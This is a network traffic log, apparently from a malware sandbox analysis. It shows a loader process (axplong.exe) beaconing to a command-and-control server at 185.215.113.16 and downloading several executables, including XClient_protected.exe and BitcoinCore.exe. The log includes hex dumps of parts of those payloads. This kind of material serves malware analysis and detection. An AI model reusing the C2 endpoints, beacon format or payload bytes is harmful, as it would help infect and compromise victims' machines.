Aug 26, 2024 23:29:37.294790983 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 26 Aug 2024 21:29:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=79 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.7	49734	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:18.385993958 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 30 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000066001&unit=246122658369
Aug 26, 2024 23:29:19.148386002 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 26, 2024 23:29:19.152981043 CEST	54	OUT	GET /inc/Set-up.exe HTTP/1.1 Host: 185.215.113.16
Aug 26, 2024 23:29:19.398175955 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:19 GMT Content-Type: application/octet-stream Content-Length: 6573502 Last-Modified: Sun, 25 Aug 2024 12:35:23 GMT Connection: keep-alive ETag: "66cb250b-644dbe" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 06 9e ca 66 00 44 5e 00 ce 24 00 00 e0 00 06 01 0b 01 02 23 00 34 47 00 00 96 59 00 00 e4 66 00 b0 14 00 00 00 10 00 00 00 50 47 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 e0 c5 00 00 06 00 00 5a 4a 65 00 02 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 90 b2 00 42 00 00 00 00 a0 b2 00 e4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 b2 00 d4 20 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 fe 47 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELfD^$#4GYfPG@ZJe B $G.text3G4G`P`.datahPG:G@`.rdata8pGNG@`@/4y HzG@0@.bssTfK`.edataBjK@0@.idatalK@0.CRT4vK@0.tlsxK@0.reloc "zK@0B/14Y@B/29Y@B/41XLNL[@B/55B[@B/67T~\
Aug 26, 2024 23:29:19.398195982 CEST	1236	IN	Data Raw: 00 00 00 00 00 40 00 30 42 2f 38 30 00 00 00 00 00 61 09 00 00 00 20 c4 00 00 0a 00 00 00 9c 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 31 00 00 00 00 00 05 8b 01 00 00 30 c4 00 00 8c 01 00 00 a6 5c 00 00 00 00 00 00 00 00 00 00 Data Ascii: @0B/80a \@B/910\@B/1022^@B
Aug 26, 2024 23:29:19.398205996 CEST	1236	IN	Data Raw: 83 f3 01 80 fa 22 0f 44 cb eb e8 8d b4 26 00 00 00 00 8d 76 00 84 d2 74 14 8d 74 26 00 0f b6 50 01 83 c0 01 84 d2 74 05 80 fa 20 7e f0 a3 04 a0 8b 00 8b 1d 4c 77 f2 00 85 db 74 14 b8 0a 00 00 00 f6 45 d0 01 0f 85 e2 00 00 00 a3 00 50 87 00 8b 1d Data Ascii: "D&vtt&Pt ~LwtEP$44$!G EFEE$0!Gp4$!GCOt$L$$g!G9}uEEE JF<D$ D$$
Aug 26, 2024 23:29:19.398216009 CEST	1236	IN	Data Raw: 14 c7 44 24 10 01 00 00 00 89 4c 24 0c c7 44 24 08 02 00 00 00 c7 44 24 04 00 00 00 00 89 14 24 e8 92 fd 01 00 89 03 8b 45 08 c7 40 78 24 00 00 00 90 81 c4 dc 00 00 00 5b 5e 5f 5d c3 55 89 e5 57 56 53 81 ec cc 00 00 00 8b 45 08 8b 40 3c 8b 00 8b Data Ascii: D$L$D$D$$E@x$[^_]UWVSE@<0E@4EEUE@ME@]E@8}E@EE@<UE@DME@]E@T8}E@8EE@E
Aug 26, 2024 23:29:19.398226023 CEST	656	IN	Data Raw: 00 c7 45 cc 3b 36 47 00 c7 45 d0 86 2b 83 00 c7 45 d4 a6 18 7e 00 c7 45 d8 d0 8b 80 00 c7 45 f0 06 00 00 00 8d 45 08 89 45 dc 8d 45 0c 89 45 e0 8d 45 10 89 45 e4 8d 45 14 89 45 e8 8d 45 18 89 45 ec 8b 45 f0 83 f8 07 77 11 8b 45 f0 8b 44 85 bc 8d Data Ascii: E;6GE+E~EEEEEEEEEEEEEwEDU$UEEEEE(EE,EE8EE<EExEE\|EE$uFED$XED$TED$PD$LD$HD$DD$@ED$<EtD$8
Aug 26, 2024 23:29:19.398236036 CEST	1236	IN	Data Raw: 8b 45 08 8b 40 50 8b 30 89 75 b4 8b 45 08 8b 40 4c 8b 38 89 7d b0 8b 45 08 8b 40 48 8b 00 89 45 ac 8b 45 08 8b 40 44 8b 08 89 4d a8 8b 45 08 8b 40 40 8b 18 89 5d a4 8b 45 08 8b 40 3c 8b 30 89 75 a0 8b 45 08 8b 40 38 8b 38 89 7d 9c 8b 45 08 8b 40 Data Ascii: E@P0uE@L8}E@HEE@DME@@]E@<0uE@88}E@4EE@0ME@,]E@(0uE@$8}E@ EE@ME@\|E@8E@0E@E@E@xE$U$UT
Aug 26, 2024 23:29:19.398247004 CEST	1236	IN	Data Raw: 89 e5 83 ec 38 c7 45 e8 d2 23 40 00 c7 45 ec 12 24 40 00 c7 45 f0 10 24 40 00 c7 45 f4 00 00 00 00 8b 45 f4 8b 44 85 e8 90 ff e0 8b 45 28 89 44 24 1c 8b 45 24 89 44 24 18 8b 45 1c 89 44 24 14 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 Data Ascii: 8E#@E$@E$@EEDE(D$E$D$ED$ED$ED$ED$ED$E$E(D$E $3hU8EL$@EP$@EED9ED$ED$ED$ED$E$9DEEDUWVSE$
Aug 26, 2024 23:29:19.398307085 CEST	1236	IN	Data Raw: 40 40 8b 08 89 4d e4 8b 45 08 8b 40 3c 8b 18 89 5d e0 8b 45 08 8b 40 38 8b 30 89 75 dc 8b 45 08 8b 40 34 8b 38 89 7d d8 8b 45 08 8b 40 30 8b 00 89 45 d4 8b 45 08 8b 40 2c 8b 08 89 4d d0 8b 45 08 8b 40 28 8b 18 89 5d cc 8b 45 08 8b 40 24 8b 30 89 Data Ascii: @@ME@<]E@80uE@48}E@0EE@,ME@(]E@$0uE@ 8}E@EE@ME@8E@0E@E@E@EET$DUT$@UT$<UT$8UT$4UT$0UT$,UT$(UT$$UT$ UT$U
Aug 26, 2024 23:29:19.398319006 CEST	672	IN	Data Raw: 90 c9 c3 55 89 e5 83 ec 38 c7 45 ec 77 2d 40 00 c7 45 f0 79 2d 40 00 c7 45 f4 01 00 00 00 8b 45 f4 8b 44 85 ec 90 ff e0 eb 29 8b 45 18 89 44 24 10 8b 45 14 89 44 24 0c 8b 45 10 89 44 24 08 8b 45 0c 89 44 24 04 8b 45 08 89 04 24 e8 40 f0 07 00 eb Data Ascii: U8Ew-@Ey-@EED)ED$ED$ED$ED$E$@U(E-@E-@EED2ED$ED$ED$E$9EEDUWVSE@xE@tME@p]E@l0uE@h8}E
Aug 26, 2024 23:29:19.398715019 CEST	1236	IN	Data Raw: 89 54 24 1c 8b 55 88 89 54 24 18 89 7c 24 14 89 74 24 10 89 5c 24 0c 89 4c 24 08 8b 4d 84 89 4c 24 04 89 04 24 e8 3d fd 40 00 8b 45 08 c7 40 7c 01 00 00 00 90 81 c4 fc 00 00 00 5b 5e 5f 5d c3 55 89 e5 8b 45 08 c7 40 0c 02 00 00 00 90 5d c3 55 89 Data Ascii: T$UT$\|$t$\$L$ML$$=@E@\|[^_]UE@]UWVSEi0@Ep0@EEDHEEEEE]E0uE8E0EE$$$\$\|D$xD$tD$p
Aug 26, 2024 23:29:19.398808956 CEST	1236	IN	Data Raw: ff ff ff 89 54 24 3c 8b 95 5c ff ff ff 89 54 24 38 8b 95 58 ff ff ff 89 54 24 34 dd 5c 24 2c 8b 95 54 ff ff ff 89 54 24 28 8b 95 50 ff ff ff 89 54 24 24 c7 44 24 20 00 00 01 00 89 7c 24 1c 89 5c 24 18 89 74 24 14 dd 5c 24 0c 89 4c 24 08 8b b5 4c Data Ascii: T$<\T$8XT$4\$,TT$(PT$$D$ \|$\$t$\$L$Lt$$w>UPE$5EUP\|\|E$hEE0E0fE$hEE`

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49738	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:25.802203894 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 32 39 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000129001&unit=246122658369
Aug 26, 2024 23:29:26.523678064 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 26, 2024 23:29:26.524970055 CEST	55	OUT	GET /inc/runtime.exe HTTP/1.1 Host: 185.215.113.16
Aug 26, 2024 23:29:26.767709017 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:26 GMT Content-Type: application/octet-stream Content-Length: 1146632 Last-Modified: Sat, 10 Aug 2024 22:51:40 GMT Connection: keep-alive ETag: "66b7eefc-117f08" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 7e 07 00 00 42 00 00 af 38 00 00 00 10 00 00 00 90 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 c0 10 00 00 04 00 00 dc 84 11 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 ac [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOt~B8@@@P.`.textrt `.rdatan+,x@@.data+@.ndata.rsrc@@.reloc@B
Aug 26, 2024 23:29:26.767805099 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d 0c 46 8b 45 14 75 0d 83 48 18 10 Data Ascii: U\}t+}FEuHGHPuuu@KSV5GWEPu@eEEPu@}eD@FRVVU+MMEFQNUMMVTU
Aug 26, 2024 23:29:26.767816067 CEST	1236	IN	Data Raw: 04 00 55 8b ec 81 ec 10 02 00 00 53 56 57 8d 45 fc 50 a1 90 eb 47 00 83 c8 08 50 33 db 53 ff 75 0c ff 75 08 ff 15 04 90 40 00 3b c3 75 69 8b 35 00 90 40 00 bf 05 01 00 00 eb 19 39 5d 10 75 4b 53 8d 85 f0 fd ff ff 50 ff 75 fc e8 b2 ff ff ff 85 c0 Data Ascii: USVWEPGP3Suu@;ui5@9]uKSPuuWPSutu@jN;t$S5Guuu@3@_^[9Guuu@uU@@Vt5dGEPGEPjj"PV
Aug 26, 2024 23:29:26.767827988 CEST	1236	IN	Data Raw: 68 04 20 00 00 56 ff 15 70 90 40 00 85 c0 74 24 8b 45 08 3b c6 76 29 66 39 18 74 24 56 e8 70 49 00 00 3b c3 74 0e 83 c0 2c 50 ff 75 08 e8 94 46 00 00 eb 0c 33 c0 66 89 07 c7 45 fc 01 00 00 00 39 5d dc 0f 85 2b 17 00 00 68 04 20 00 00 57 57 ff 15 Data Ascii: h Vp@t$E;v)f9t$VpI;t,PuF3fE9]+h WWl@jMQVh SPSh@3EfjXPVDEj16EVPQh@uMHVBV@tVE
Aug 26, 2024 23:29:26.767838955 CEST	1236	IN	Data Raw: 8b c7 99 f7 f9 eb 1e 33 ff c7 45 fc 01 00 00 00 eb 3f 0b f9 eb 3b 23 f9 eb 37 33 f9 eb 33 33 c0 3b fb 0f 94 c0 8b f8 eb 28 3b fb 75 04 3b cb 74 09 33 ff 47 eb 1b 3b fb 75 f3 33 ff eb 13 3b cb 74 c5 8b c7 99 f7 f9 8b fa eb 06 d3 e7 eb 02 d3 ff 57 Data Ascii: 3E?;#7333;(;u;t3G;u3;tWCjjYPWVH@E=@;t^H;t?;u;u"uh@CYYh jS@IPEW@V/A@PW A@VP';t+;uh@C
Aug 26, 2024 23:29:26.767848969 CEST	1236	IN	Data Raw: 45 f0 66 89 0f c7 45 fc 01 00 00 00 3b c3 0f 84 b8 0d 00 00 50 6a 40 ff 15 24 91 40 00 89 45 08 3b c3 0f 84 a4 0d 00 00 50 ff 75 f0 53 ff 75 bc e8 34 5f 00 00 85 c0 74 34 8d 45 bc 50 8d 45 f8 50 68 38 98 40 00 ff 75 08 e8 15 5f 00 00 85 c0 74 1b Data Ascii: EfE;Pj@$@E;PuSu4_t4EPEPh8@u_tEpV<EpW;]u0@Qjh VW}NuEVWh@jh VWNuEVWh@E9GjR
Aug 26, 2024 23:29:26.767860889 CEST	1236	IN	Data Raw: 45 08 39 5d e4 75 44 6a 02 e8 5a ed ff ff 8b f8 3b fb 0f 84 10 f2 ff ff 6a 33 e8 52 ec ff ff 8b f0 56 57 ff 15 10 90 40 00 56 68 f8 40 41 00 ff 75 08 89 45 ec 68 50 95 40 00 e8 a5 3a 00 00 83 c4 10 57 ff 15 08 90 40 00 eb 3c 6a 22 e8 1f ec ff ff Data Ascii: E9]uDjZ;j3RVW@Vh@AuEhP@:W@<j"Vuh$@:E;udGMQVP.E9]h;t=dGEEEjEjEWE29YSEEPGSPSSSu3FWu
Aug 26, 2024 23:29:26.767901897 CEST	1236	IN	Data Raw: 50 68 f0 00 41 00 56 e8 cb 32 00 00 50 ff 15 54 91 40 00 e9 34 ed ff ff 6a 02 59 e8 67 e7 ff ff 89 45 f8 83 f8 01 0f 8c f8 03 00 00 b9 03 20 00 00 3b c1 7e 03 89 4d f8 66 39 1e 0f 84 7b ff ff ff 56 89 5d cc e8 8d 32 00 00 89 45 bc 39 5d f8 0f 8e Data Ascii: PhAV2PT@4jYgE ;~Mf9{V]2E9]fSEPjEPuX@J}@9]u0f}t2f}t+fEfwFMf;;u\|EfEf9EtffjSjf97uSj
Aug 26, 2024 23:29:26.767913103 CEST	1236	IN	Data Raw: 00 38 22 40 00 cc 22 40 00 fd 22 40 00 92 23 40 00 c1 23 40 00 f0 23 40 00 fb 24 40 00 65 26 40 00 fc 26 40 00 13 27 40 00 97 27 40 00 e3 27 40 00 80 28 40 00 ff 29 40 00 84 2a 40 00 e2 2a 40 00 fd 2a 40 00 23 2b 40 00 9f 2b 40 00 8a 2c 40 00 d7 Data Ascii: 8"@"@"@#@#@#@$@e&@&@'@'@'@(@)@@@*@#+@+@,@,@-@-@-@.@U.@n/@/@I0@0@0@0@0@2@6@:@?@U@Y@]@a@l@y@@@@U}ujhju4@E}uLtB
Aug 26, 2024 23:29:26.767923117 CEST	76	IN	Data Raw: ff 85 c0 0f 84 79 01 00 00 83 3d 0c eb 47 00 00 75 7a 6a 1c 53 8d 45 d8 50 e8 b3 27 00 00 8b 45 d8 a9 f0 ff ff ff 75 72 81 7d dc ef be ad de 75 69 81 7d e8 49 6e 73 74 75 60 81 7d e4 73 6f 66 74 75 57 81 7d e0 4e 75 6c 6c 75 4e Data Ascii: y=GuzjSEP'Eur}ui}Instu`}softuW}NulluN
Aug 26, 2024 23:29:26.768389940 CEST	1236	IN	Data Raw: 09 45 08 8b 45 08 8b 0d 74 c1 42 00 83 e0 02 09 05 80 eb 47 00 8b 45 f0 89 0d 0c eb 47 00 3b c6 0f 8f 18 01 00 00 f6 45 08 08 75 06 f6 45 08 04 75 41 ff 45 fc 8d 70 fc 3b fe 76 12 8b fe eb 0e f6 45 08 02 75 08 6a 00 e8 d2 fb ff ff 59 3b 35 38 dd Data Ascii: EEtBGEG;EuEuAEp;vEujY;58C}WSu;E=tB+ 3jY9G9]t*5tBjEPE;Euj@$@GPuVSj;EuZE5G

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49739	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:28.651724100 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000150001&unit=246122658369
Aug 26, 2024 23:29:29.397407055 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 26, 2024 23:29:29.399250984 CEST	65	OUT	GET /inc/XClient_protected.exe HTTP/1.1 Host: 185.215.113.16
Aug 26, 2024 23:29:29.641506910 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:29 GMT Content-Type: application/octet-stream Content-Length: 114176 Last-Modified: Sun, 25 Aug 2024 17:47:53 GMT Connection: keep-alive ETag: "66cb6e49-1be00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d4 1d e4 63 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 16 01 00 00 a6 00 00 00 00 00 00 4e 34 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc 33 01 00 4f 00 00 00 00 40 01 00 98 a3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELcN4 @@ @3O@ H.textT `.rsrc@@@.reloc@B04HPy0WH3W3./\{"}{"}{"}~(9~(((n~(~((rp((@(A(f~#}}($($~%:&~/sM%sN(O~(~o9 ~((G9~(ss)~J
Aug 26, 2024 23:29:29.641520023 CEST	164	IN	Data Raw: 0c 00 00 04 1f 0d 80 0d 00 00 04 2a 2e 73 2e 00 00 06 80 0e 00 00 04 2a 72 7e 09 00 00 04 6f 03 00 00 06 20 e8 03 00 00 5a 28 62 00 00 0a 28 14 00 00 06 2b e4 2e 73 34 00 00 06 80 10 00 00 04 2a 1a 7e 26 00 00 04 2a 1e 02 80 26 00 00 04 2a 1a 7e Data Ascii: .s.r~o Z(b(+.s4~&&~''~((~))~**~++~,
Aug 26, 2024 23:29:29.641530037 CEST	1236	IN	Data Raw: 80 2c 00 00 04 2a 1a 7e 2d 00 00 04 2a 1a 7e 2e 00 00 04 2a 1e 02 80 2e 00 00 04 2a 1a 7e 2f 00 00 04 2a 1e 02 80 2f 00 00 04 2a 1a 7e 30 00 00 04 2a 1e 02 80 30 00 00 04 2a 2a 02 28 91 00 00 0a 16 fe 03 2a 32 7e 1d 00 00 04 03 6f 92 00 00 0a 2a Data Ascii: ,~-~..~//~00(2~os%rpo(rp(oopoo(U (bs%rpor%po%r%pooo(UVs$-s1~55F(`
Aug 26, 2024 23:29:29.641606092 CEST	224	IN	Data Raw: 28 d2 00 00 06 2a 52 02 03 8c 9b 00 00 01 7d b3 01 00 04 02 1b 7d b4 01 00 04 2a 52 02 03 8c be 00 00 01 7d b3 01 00 04 02 1c 7d b4 01 00 04 2a 42 02 03 7d b3 01 00 04 02 1f 0b 7d b4 01 00 04 2a 52 02 28 d2 00 00 06 25 03 7d b1 01 00 04 04 6f e3 Data Ascii: (R}}R}}B}}R(%}oV(%}joV(}}>}}v{:rp{o?R}A}*{9{uA9
Aug 26, 2024 23:29:29.641616106 CEST	1236	IN	Data Raw: 00 02 7b b3 01 00 04 a5 41 00 00 01 2a 16 2a 56 02 1f 09 7d b4 01 00 04 02 03 8c bf 00 00 01 7d b3 01 00 04 2a 52 02 1e 7d b4 01 00 04 02 03 8c 4d 00 00 01 7d b3 01 00 04 2a 1e 02 28 e4 00 00 06 2a 22 02 03 28 e3 00 00 06 2a 1e 02 28 d9 00 00 06 Data Ascii: {A*V}}R}M}("(("(("({2{sJs}($:om(2 o[j o[(o~ o[(j(oz9
Aug 26, 2024 23:29:29.641657114 CEST	1236	IN	Data Raw: 12 01 28 3c 00 00 0a 0c 08 6f 3d 00 00 0a 0d 16 13 04 38 98 00 00 00 09 11 04 a3 3c 00 00 01 13 05 08 11 05 6f 38 00 00 0a 13 06 11 06 72 0b 03 00 70 6f 3e 00 00 0a 6f 3f 00 00 0a 13 07 11 06 72 23 03 00 70 6f 3e 00 00 0a 6f 3f 00 00 0a 13 08 11 Data Ascii: (<o=8<o8rpo>o?r#po>o?rCpo>o?(@98oArcpoB:oC&9o/Xi?^(D:;o/~#oE8(F
Aug 26, 2024 23:29:29.641673088 CEST	268	IN	Data Raw: 00 06 13 05 11 04 60 39 0e 00 00 00 11 05 6f 58 00 00 0a 13 05 38 09 00 00 00 11 05 6f 41 00 00 0a 13 05 09 13 06 11 06 1f 70 3f 32 00 00 00 11 06 20 87 00 00 00 3d 26 00 00 00 72 b9 03 00 70 09 13 07 12 07 fe 16 54 00 00 01 6f 3f 00 00 0a 72 bd Data Ascii: `9oX8oAp?2 =&rpTo?rp(58T%%%%%[%\% % % % %%%'%&%(%.%$%#(+9rpTo?rp
Aug 26, 2024 23:29:29.641922951 CEST	1236	IN	Data Raw: 1f 20 40 07 00 00 00 72 d5 03 00 70 13 05 11 05 28 40 00 00 0a 3a ba 00 00 00 73 51 00 00 0a 13 08 7e 08 00 00 04 07 28 5a 00 00 0a 39 0f 00 00 00 11 08 11 05 6f 5b 00 00 0a 26 38 82 00 00 00 11 08 28 5c 00 00 0a 6f 5b 00 00 0a 26 11 08 28 5c 00 Data Ascii: @rp(@:sQ~(Z9o[&8(\o[&(\o[&<%rp%(]rp(^%rp%%rp%%rp(_o[&(\o[&o[&o?(~(&~J
Aug 26, 2024 23:29:29.642009020 CEST	1236	IN	Data Raw: 00 06 80 24 00 00 04 7e 1e 00 00 04 7e 20 00 00 04 6f b1 00 00 06 80 20 00 00 04 7e 1e 00 00 04 7e 23 00 00 04 6f b1 00 00 06 80 23 00 00 04 28 7c 00 00 06 80 21 00 00 04 7e 1e 00 00 04 7e 1c 00 00 04 6f b1 00 00 06 80 1c 00 00 04 7e 1e 00 00 04 Data Ascii: $~~ o ~~#o#(\|!~~o~~o(osq(9&*A770g~orost_st(n~ouovrQp(w~(oox
Aug 26, 2024 23:29:29.642019987 CEST	1236	IN	Data Raw: 16 28 48 00 00 06 dd 0c 00 00 00 26 16 28 48 00 00 06 dd 00 00 00 00 2a 00 00 00 41 4c 00 00 00 00 00 00 ce 00 00 00 26 00 00 00 f4 00 00 00 06 00 00 00 01 00 00 01 02 00 00 00 21 01 00 00 82 00 00 00 a3 01 00 00 0f 00 00 00 00 00 00 00 00 00 00 Data Ascii: (H&(HAL&!0j(J%:&8((E%:&8((=%:&8((;%:&8(&(H]]0
Aug 26, 2024 23:29:29.642030954 CEST	672	IN	Data Raw: 05 00 00 1b 6f e9 00 00 06 06 72 83 03 00 70 6f e1 00 00 06 6f ee 00 00 06 0b 07 28 b5 00 00 06 0c 08 20 96 da 2d 5a 42 41 00 00 00 08 20 fd 39 c1 25 42 1b 00 00 00 08 20 64 56 4d 02 3b db 00 00 00 08 20 fd 39 c1 25 3b a6 00 00 00 38 14 04 00 00 Data Ascii: orpoo( -ZBA 9%B dVM; 9%;8 %.; -Z;a8 B i; ;8 w; zcI;5 @rOp(Z:8rap(Z:8rp(Z:%8s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49740	185.215.113.16	80	7944	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 26, 2024 23:29:30.947184086 CEST	184	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 31 39 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000190001&unit=246122658369
Aug 26, 2024 23:29:31.720683098 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Aug 26, 2024 23:29:31.724873066 CEST	59	OUT	GET /inc/BitcoinCore.exe HTTP/1.1 Host: 185.215.113.16
Aug 26, 2024 23:29:31.975580931 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 26 Aug 2024 21:29:31 GMT Content-Type: application/octet-stream Content-Length: 10481152 Last-Modified: Sun, 25 Aug 2024 13:30:36 GMT Connection: keep-alive ETag: "66cb31fc-9fee00" Accept-Ranges: bytes Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 